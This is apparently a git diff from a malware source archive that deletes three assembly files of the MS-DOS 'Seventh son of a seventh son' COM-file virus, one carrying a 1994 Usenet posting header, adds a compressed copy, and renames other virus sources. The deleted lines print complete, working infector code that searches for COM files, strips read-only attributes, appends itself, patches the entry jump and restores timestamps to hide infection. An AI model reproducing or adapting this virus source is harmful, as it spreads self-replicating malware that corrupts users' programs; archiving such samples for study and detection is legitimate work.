diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm
deleted file mode 100644
index 9e1c79c2..00000000
--- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm
+++ /dev/null
@@ -1,251 +0,0 @@ -From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994 -Xref: netcom.com alt.comp.virus:506 -Path: netcom.com!ix.netcom.com!netnews -From: Zeppelin@ix.netcom.com (Mr. G) -Newsgroups: alt.comp.virus -Subject: 7th Son Virus -Date: 29 Nov 1994 13:02:59 GMT -Organization: Netcom -Lines: 236 -Distribution: world -Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com> -References: -NNTP-Posting-Host: ix-pas2-10.ix.netcom.com - -;*********************************************************************** -***** -;* Seventh son of a seventh son version 4 -;* -;* Compile with MASM 4.0 -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;*********************************************************************** -***** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - - .RADIX 16 - -FILELEN equ end - start -MINTARGET equ 1000d -MAXTARGET equ -(FILELEN+40) - - - -;*********************************************************************** -***** -;* Dummy program (infected) -;*********************************************************************** -***** - - org 100 - -begin: db 4Dh ;virus mark - db 0E9h, 4, 0 ;jump to virus entry - - -;*********************************************************************** -***** -;* Begin of the virus -;*********************************************************************** -***** - -start: db 0CDh, 20h, 0, 0 - - cld - mov si,0100h - push si ;push new IP on stack - mov di,si - add si,[si+2] ;si -> start - - push si ;restore original begin - movsw - movsw - pop si - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - lea dx,[si+(offset ni24 - 0104)] ;set new int24 -vector - mov ah,25h - push ax - int 21 - - mov ah,2Fh 
;get DTA adres - int 21 - push es - push bx - - add dx,070h ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - push dx - - lea di,[si+(offset generation-0104)] ;check -generation - cmp [di],0707h - jne verder - - lea dx,[di+2] ;7th son of a 7th son! - mov ah,09h - int 21 - -verder: mov ax,[di] ;update generations - xchg ah,al - mov al,1 - mov [di],ax - - lea dx,[di+33d] ;find first COM-file - xor cx,cx - mov ah,4Eh -infloop: int 21 - pop dx - jc stop - - push dx - - xor cx,cx ;clear -read-only-arttribute - mov ax,4301 - int 21 - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - mov dx,si - mov ah,3fh - int 21 - - cmp byte ptr [si],4Dh ;already infected or an -EXE? - je return2 - cmp byte ptr [si],5Ah ;or a weird EXE? - je return2 - - mov al,2 ;go to end of file - call seek - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of -file - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? 
- pop ax - jnz return2 - - xchg ax,bp - mov al,0 ;go to begin of file - call seek - - mov word ptr [si],0E94Dh ;write mark and -jump-command - mov word ptr [si+2],bp - mov ah,40h - int 21 - - inc byte ptr [di] ;number of next son - -return2: pop dx ;restore file date & -time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: mov ah,4Fh ;find next file - jmp short infloop - -stop: pop dx ;restore DTA adres - pop ds - mov ah,1Ah - int 21 - - pop ax ;restore int24 vector - pop ds - pop dx - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - push cs - push cs - pop ds - pop es - - ret - -seek: mov ah,42 - cwd -int21: xor cx,cx - int 21 - mov cl,4 - mov dx,si - ret - - -;*********************************************************************** -***** -;* Interupt handler 24 -;*********************************************************************** -***** - -ni24: mov al,03 - iret - - -;*********************************************************************** -***** -;* Data -;*********************************************************************** -***** - -generation db 1,1 -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - - - diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm deleted file mode 100644 index 1ca91447..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm +++ /dev/null 
@@ -1,232 +0,0 @@ -;**************************************************************************** -;* Seventh son of a seventh son version 2 -;**************************************************************************** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - -FILELEN equ end - start -MINTARGET equ 1000 -MAXTARGET equ -(FILELEN+40h) - - org 100h - - .RADIX 16 - - -;**************************************************************************** -;* Dummy program (infected) -;**************************************************************************** - -begin: db 4Dh - jmp start - - -;**************************************************************************** -;* Begin of the virus -;**************************************************************************** - -start: call start2 -start2: pop bp - sub bp,0103h - - lea si,[bp+offset begbuf-4] ;restore begin of file - mov di,0100h - movsw - movsw - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - xor dl,dl ;clear the flag - mov ax,3301h - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - mov dx,offset ni24 - 4 ;set new int24 vector - add dx,bp - mov ax,2524h - int 21 - - lea dx,[bp+offset end] ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - mov word ptr [bp+offset nameptr-4],dx - - lea si,[bp+offset grandfather-4] ;check generation - cmp [si],0606h - jne verder - - lea dx,[bp+offset sontxt-4] ;7th son of a 7th son! 
- mov ah,09h - int 21 - -verder: mov ax,[si] ;update generations - xchg ah,al - xor al,al - mov [si],ax - - lea dx,[bp+offset filename-4] ;find first COM-file - xor cx,cx - mov ah,4Eh - int 21 - -infloop: mov dx,word ptr [bp+offset nameptr-4] - call infect - - mov ah,4Fh ;find next file - int 21 - jnc infloop - - pop ds ;restore int24 vector - pop dx - mov ax,2524h - int 21 - - pop dx ;restore ctrl-break flag - mov ax,3301h - int 21 - - push cs - push cs - pop ds - pop es - mov ax,0100h ;put old start-adres on stack - push ax - - ret - - -;**************************************************************************** -;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) -;**************************************************************************** - -infect: cld - - mov ax,4300h ;ask attributes - int 21 - push cx - - xor cx,cx ;clear flags - call setattr - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - lea dx,[bp+offset begbuf-4] - mov ah,3fh - int 21 - - mov al,byte ptr [bp+begbuf-4] ;already infected? - cmp al,4Dh - je return2 - cmp al,5Ah ;or a weird EXE? - je return2 - - call endptr ;get file-length - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of file - lea dx,[bp+offset start-4] - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? 
- pop ax - jnz return2 - - sub ax,4 ;calculate new start-adres - mov word ptr [bp+newbeg-2],ax - - call beginptr ;write new begin of file - mov cx,4 - lea dx,[bp+offset newbeg-4] - mov ah,40h - int 21 - - inc byte ptr [si] ;number of next son - -return2: pop dx ;restore file date & time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: pop cx ;restore file-attribute -; call setattr - -; ret - - -;**************************************************************************** -;* Changes file-attributes -;**************************************************************************** - -setattr: mov dx,word ptr [bp+offset nameptr-4] - mov ax,4301h - int 21 - ret - - -;**************************************************************************** -;* Subroutines for file-pointer -;**************************************************************************** - -beginptr: mov ax,4200h ;go to begin of file - jmp short ptrvrdr - -endptr: mov ax,4202h ;go to end of file -ptrvrdr: xor cx,cx - xor dx,dx - int 21 - ret - - -;**************************************************************************** -;* Interupt handler 24 -;**************************************************************************** - -ni24: mov al,03 - iret - - -;**************************************************************************** -;* Data -;**************************************************************************** - -begbuf db 0CDh, 20h, 0, 0 -newbeg db 4Dh, 0E9h, 0, 0 -nameptr dw ? -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -grandfather db 0 -father db 0 -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - \ No newline at end of file diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm deleted file mode 100644 index 1d83115b..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm +++ /dev/null 
@@ -1,218 +0,0 @@ -;**************************************************************************** -;* Seventh son of a seventh son version 4 -;* -;* Compile with MASM 4.0 -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;**************************************************************************** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - - .RADIX 16 - -FILELEN equ end - start -MINTARGET equ 1000d -MAXTARGET equ -(FILELEN+40) - - - -;**************************************************************************** -;* Dummy program (infected) -;**************************************************************************** - - org 100 - -begin: db 4Dh ;virus mark - db 0E9h, 4, 0 ;jump to virus entry - - -;**************************************************************************** -;* Begin of the virus -;**************************************************************************** - -start: db 0CDh, 20h, 0, 0 - - cld - mov si,0100h - push si ;push new IP on stack - mov di,si - add si,[si+2] ;si -> start - - push si ;restore original begin - movsw - movsw - pop si - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector - mov ah,25h - push ax - int 21 - - mov ah,2Fh ;get DTA adres - int 21 - push es - push bx - - add dx,070h ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - push dx - - lea di,[si+(offset generation-0104)] ;check generation - cmp [di],0707h - jne verder - - lea dx,[di+2] ;7th son of a 7th son! 
- mov ah,09h - int 21 - -verder: mov ax,[di] ;update generations - xchg ah,al - mov al,1 - mov [di],ax - - lea dx,[di+33d] ;find first COM-file - xor cx,cx - mov ah,4Eh -infloop: int 21 - pop dx - jc stop - - push dx - - xor cx,cx ;clear read-only-arttribute - mov ax,4301 - int 21 - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - mov dx,si - mov ah,3fh - int 21 - - cmp byte ptr [si],4Dh ;already infected or an EXE? - je return2 - cmp byte ptr [si],5Ah ;or a weird EXE? - je return2 - - mov al,2 ;go to end of file - call seek - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of file - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? - pop ax - jnz return2 - - xchg ax,bp - mov al,0 ;go to begin of file - call seek - - mov word ptr [si],0E94Dh ;write mark and jump-command - mov word ptr [si+2],bp - mov ah,40h - int 21 - - inc byte ptr [di] ;number of next son - -return2: pop dx ;restore file date & time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: mov ah,4Fh ;find next file - jmp short infloop - -stop: pop dx ;restore DTA adres - pop ds - mov ah,1Ah - int 21 - - pop ax ;restore int24 vector - pop ds - pop dx - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - push cs - push cs - pop ds - pop es - - ret - -seek: mov ah,42 - cwd -int21: xor cx,cx - int 21 - mov cl,4 - mov dx,si - ret - - -;**************************************************************************** -;* Interupt handler 24 -;**************************************************************************** - -ni24: mov al,03 - iret - - -;**************************************************************************** -;* Data -;**************************************************************************** - -generation db 1,1 -sontxt db 
'Seventh son of a seventh son',0Dh, 0Ah, '$' -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - \ No newline at end of file diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm b/MSDOS/Virus.MSDOS.3apa3a.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm rename to MSDOS/Virus.MSDOS.3apa3a.asm diff --git a/MSDOS/Virus.MSDOS.7son.7z b/MSDOS/Virus.MSDOS.7son.7z new file mode 100644 index 00000000..c3bdc871 Binary files /dev/null and b/MSDOS/Virus.MSDOS.7son.7z differ diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm b/MSDOS/Virus.MSDOS.Azagoth.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm rename to MSDOS/Virus.MSDOS.Azagoth.asm diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm b/MSDOS/Virus.MSDOS.First-Star.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm rename to MSDOS/Virus.MSDOS.First-Star.asm diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm b/MSDOS/Virus.MSDOS.Gogi.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm rename to MSDOS/Virus.MSDOS.Gogi.asm